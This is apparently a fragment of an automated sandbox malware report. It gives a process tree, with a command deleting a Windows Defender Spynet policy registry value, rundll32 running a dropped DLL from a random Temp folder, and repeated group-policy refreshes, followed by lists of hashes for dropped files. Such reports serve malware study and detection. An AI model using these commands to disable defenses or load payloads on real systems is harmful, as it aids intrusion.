C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1500
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\knLrxBGDCryPZEWZ\IjHAGOmu\KsWMORk.dll",#1 /site_id 5254032⤵PID:820
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\knLrxBGDCryPZEWZ\IjHAGOmu\KsWMORk.dll",#1 /site_id 5254033⤵
- Loads dropped DLL
PID:1368
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2008
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1616
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1688
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f34c604ca705b2ae82ef2e6de0fa8860
SHA1c41ffbba4a7db3cfd73fb5ef8d9f85452f770180
SHA2563277d36daca3051e14fdc42311b8d9f8fea9a3a733530b35534193db990ed79a
SHA512bae46ba7b352cf42ffff57607949699658065b63e23cb8489fae34b89b8cc1ec6eb50baefdc85e3a0227c8dc7784bd1c050763b3593a0ead3a0a4bd96e798dec
-
Filesize
2KB
MD5f02afe31a2dab1b1c414c11b07827177
SHA18395db69fac541ab237c56a96dca3c7e5918677d
SHA256e44f6daa90ffbc39f9d9bb0fd64cf67d5e4a54ab14d1e4b18da548c80f8f5104
SHA512e7b972b6ecbcd12ffb227581ef5a1c342ba1192b3cb83c9a278e091219e70ec296bb0be8999fcad0d3cc512c5042558c707040d79fde4f09a6b24d4282240ade
-
Filesize
2KB
MD5dcfacc56f075cef7577a70c709ee9f41
SHA115a5faa0611a4640500e85f52f8eae201cc1c8f5
SHA256a358f227b50998191a6b017e1cfdff3e469488dc326bb5c2ee0dfd9df1a4552a
SHA512cf788db6715d899870345053062a2b7c1930b72d3dcd3c57cf5646b941c37dfc238ad2516fb6aa2fe50b9e0fd709d29c4a86cd2d4418983653ba321866ce3bbd
-
Filesize
2KB
MD5637908533749881a2083102c0fd96787
SHA11111425a87a43d2531e734afc13c1cc679cf533b
SHA25666c89a4ae05e314471b2bb66b630559441c0d88fa619349441e65b8be73c24fa
SHA5123c48ee23bdd46bb3ad20a0502b224a66f9e11231c8ff9ea92e38cd507c249d879a2f6e2cb53c035ef611690b289144f00269f0ce483a84d2926585488d75879b
-
Filesize
2KB
MD5aca0190940547a8b83bb74110e50b1eb
SHA1e53ee8c5edb5a61e145376544902ef297d8625ec
SHA25663f689013c0c992f068807b30a3b60a084cd66f2bece16119dcb9cf1e1921d2c
SHA512aa3c9497d4da30d066d734027693fa76b97422b9ec4786ea110ac332aae131f4821a3bca5f0147284c44983c93241f499e9409d3dfa618e510f9a5a180130e17
-
Filesize
6.3MB
MD5d67e5112a9d5706d59cd5c1fdd8af7db
SHA11bac813a33ffeda53b449ef435308df0a486f0e0
SHA2560b29727f39cf778dddc2c1208603beb9fb659cb231276e395f2f0e488accb9b7
SHA512b7bd556678d4604efce7459d54252db60497618a95513fcf818606dae1926906e692add1948459b100eff3eec896cc167cc5e200bd00c5bbb8d51a4e87d17399
-
Filesize
6.3MB
MD5d67e5112a9d5706d59cd5c1fdd8af7db
SHA11bac813a33ffeda53b449ef435308df0a486f0e0
SHA2560b29727f39cf778dddc2c1208603beb9fb659cb231276e395f2f0e488accb9b7
SHA512b7bd556678d4604efce7459d54252db60497618a95513fcf818606dae1926906e692add1948459b100eff3eec896cc167cc5e200bd00c5bbb8d51a4e87d17399
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5898c59679a014926b910e38c8677e5b9
SHA103b64d428e6138e38a991c5c95d27fc19c56fb52
SHA256cdb653be055b5f4b07fcbf4fe96d7dc508034ca19f08199e3012fd56bc40fab0
SHA512b9bc585bf088faad592895d7939df169b36f4273b03fd94755f3be939d3efd2ac878614cff17e0e06913d5e0e08bfbb1c9c9926e92a9392fb30b11aedd3f4303
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5952d2896d199c49bcf49c5574aa33f2b
SHA1183ba275dc281c1fe0bb8203eae11d026302d678
SHA25663b4a163acda10571cd418b38eb992c9ada5cfb89aef0aa5fe6392dd75742370
SHA512ba59389a29692e20ae32ef3ad8b6a6547b0b8ac912007d82c850939e0d5c8113b5d401317f26a19b929925e48300cb5593362669a3722830bb5a238c4eab1b32
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5909354591d02f1cd30aee13df60e6307
SHA1e042bc662cfea93152bc331fd401de75572ec23d
SHA256e0d82430c392fb7aefee74be342419ef0b8d311aefbbb00184eb913419cb32a7
SHA512532f78da9b841d9f3aec8ebeadd3f9ca6462f8e2b27049abdc22f404373e036a6f8d73685d2aa89d6776b5b75b9e4f46832e28da88ebbd1e14e55064139c5543
-
Filesize
8KB
MD52a83b09d2954bb4507b54e48bcb9c9a7
SHA15c7180375f7b5c4e3ab93009911b4b983c0da145
SHA256bde0d28983c70ff5a13ff4fee78a91a5106b87ac72a1ba38427e0d4add7e5b95
SHA512139f761631d657da3849822bc9d5b3318f8952aed329f0dc9cb80e819dc98c469e6e3d2568e0c998e30a90a0b587d47dc66617902bec66aed4cbb6a297477203
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.2MB
MD566af46b01a3ade390d29c320463f1249
SHA16209a81ce03f1b332b5f175bd2b36120eeeb779c
SHA256f0d52ee071bd068c18cd656ddf02ad28cea6e7e87c4d22f1826667a028e9a6bb
SHA512b3179f7d6b4453735b3273052f963d939aad11e228d0d90c72bd9b4c0ee4067a5479b241b3249f3d3a05fde0cfaaf1195561d96b714cbb713cd29d22e0457dce
-
Filesize
4KB
MD508c25cc19eee42b098c809cfb803c736
SHA1841b00c0b3245151e8f30b6e92f92d5b3f12ef77
SHA256c4c9dbbbaa374c35fe98eca1e7739599943f21232a5a85a555ad8e06d8f28d10
SHA512cff98c41690f5f76d1274bc62d685c113d5508de4ab6a0a83c4a6e96759a4d99fae0e1d9ea1548c07a490d78ca0de8439c13c4b2f2fe423e6a245a84e73bc813
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD5d67e5112a9d5706d59cd5c1fdd8af7db
SHA11bac813a33ffeda53b449ef435308df0a486f0e0
SHA2560b29727f39cf778dddc2c1208603beb9fb659cb231276e395f2f0e488accb9b7
SHA512b7bd556678d4604efce7459d54252db60497618a95513fcf818606dae1926906e692add1948459b100eff3eec896cc167cc5e200bd00c5bbb8d51a4e87d17399
-
Filesize
6.3MB
MD5d67e5112a9d5706d59cd5c1fdd8af7db
SHA11bac813a33ffeda53b449ef435308df0a486f0e0
SHA2560b29727f39cf778dddc2c1208603beb9fb659cb231276e395f2f0e488accb9b7
SHA512b7bd556678d4604efce7459d54252db60497618a95513fcf818606dae1926906e692add1948459b100eff3eec896cc167cc5e200bd00c5bbb8d51a4e87d17399
-
Filesize
6.3MB
MD5d67e5112a9d5706d59cd5c1fdd8af7db
SHA11bac813a33ffeda53b449ef435308df0a486f0e0
SHA2560b29727f39cf778dddc2c1208603beb9fb659cb231276e395f2f0e488accb9b7
SHA512b7bd556678d4604efce7459d54252db60497618a95513fcf818606dae1926906e692add1948459b100eff3eec896cc167cc5e200bd00c5bbb8d51a4e87d17399
-
Filesize
6.3MB
MD5d67e5112a9d5706d59cd5c1fdd8af7db
SHA11bac813a33ffeda53b449ef435308df0a486f0e0
SHA2560b29727f39cf778dddc2c1208603beb9fb659cb231276e395f2f0e488accb9b7
SHA512b7bd556678d4604efce7459d54252db60497618a95513fcf818606dae1926906e692add1948459b100eff3eec896cc167cc5e200bd00c5bbb8d51a4e87d17399
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
6.9MB
MD5ad2a0e3d5685b98c60b90f162360513d
SHA13732caf9f4c48aefe532d0763cb01afb05ff48a9
SHA256195fd339cd909bbe7eca203088d859c3b8bd2c765a2a8afdc8cbcaf9bd062b65
SHA512be01fc46074470da365751ae927148c3c5aeefa1dcfd44e8bb5a84d2bbdd15b729e72a18c2e14349d06f8a862ac94905d16f6647ca3f9e9aa933b142299ce8ed
-
Filesize
3.6MB
MD53b96fa55de8ebbe95566b42cf21f3b68
SHA1209d2973e9b115f93b66ebf752a70f68933c2ff9
SHA256b55a615c170bb2f88e9fc830262ce1db30904a6a535dc1e9093bf78981d3cde6
SHA512627aecd6edbd25aca595be76ecfff8398db10af3ccdcbc9a4fd03cd3fe1bad12355d9ed8f382dca85588be1e28b62ffe2ac7455eb19e33466173a7092e9a3776
-
Filesize
2.1MB
MD51a576e9f57175e5141dd2bf68556acb6
SHA1e64a77d2a57442f29a6ad43fc90880f8110a3866
SHA256cc3890f1e9cbfb0f6f44b1400b9f94f05d36624ea2ac881d50ae29752824d008
SHA5122080bed2c039e97494e8d449a96d51a93cdce88bac1e969dec7b2c75aa5bf383b6a52abb20362ffc10000af8050d5ce52596d64dac9d661a72a5a48bf792da63
-
Filesize
2.1MB
MD51a576e9f57175e5141dd2bf68556acb6
SHA1e64a77d2a57442f29a6ad43fc90880f8110a3866
SHA256cc3890f1e9cbfb0f6f44b1400b9f94f05d36624ea2ac881d50ae29752824d008
SHA5122080bed2c039e97494e8d449a96d51a93cdce88bac1e969dec7b2c75aa5bf383b6a52abb20362ffc10000af8050d5ce52596d64dac9d661a72a5a48bf792da63
-
Filesize
2.1MB
MD51a576e9f57175e5141dd2bf68556acb6
SHA1e64a77d2a57442f29a6ad43fc90880f8110a3866
SHA256cc3890f1e9cbfb0f6f44b1400b9f94f05d36624ea2ac881d50ae29752824d008
SHA5122080bed2c039e97494e8d449a96d51a93cdce88bac1e969dec7b2c75aa5bf383b6a52abb20362ffc10000af8050d5ce52596d64dac9d661a72a5a48bf792da63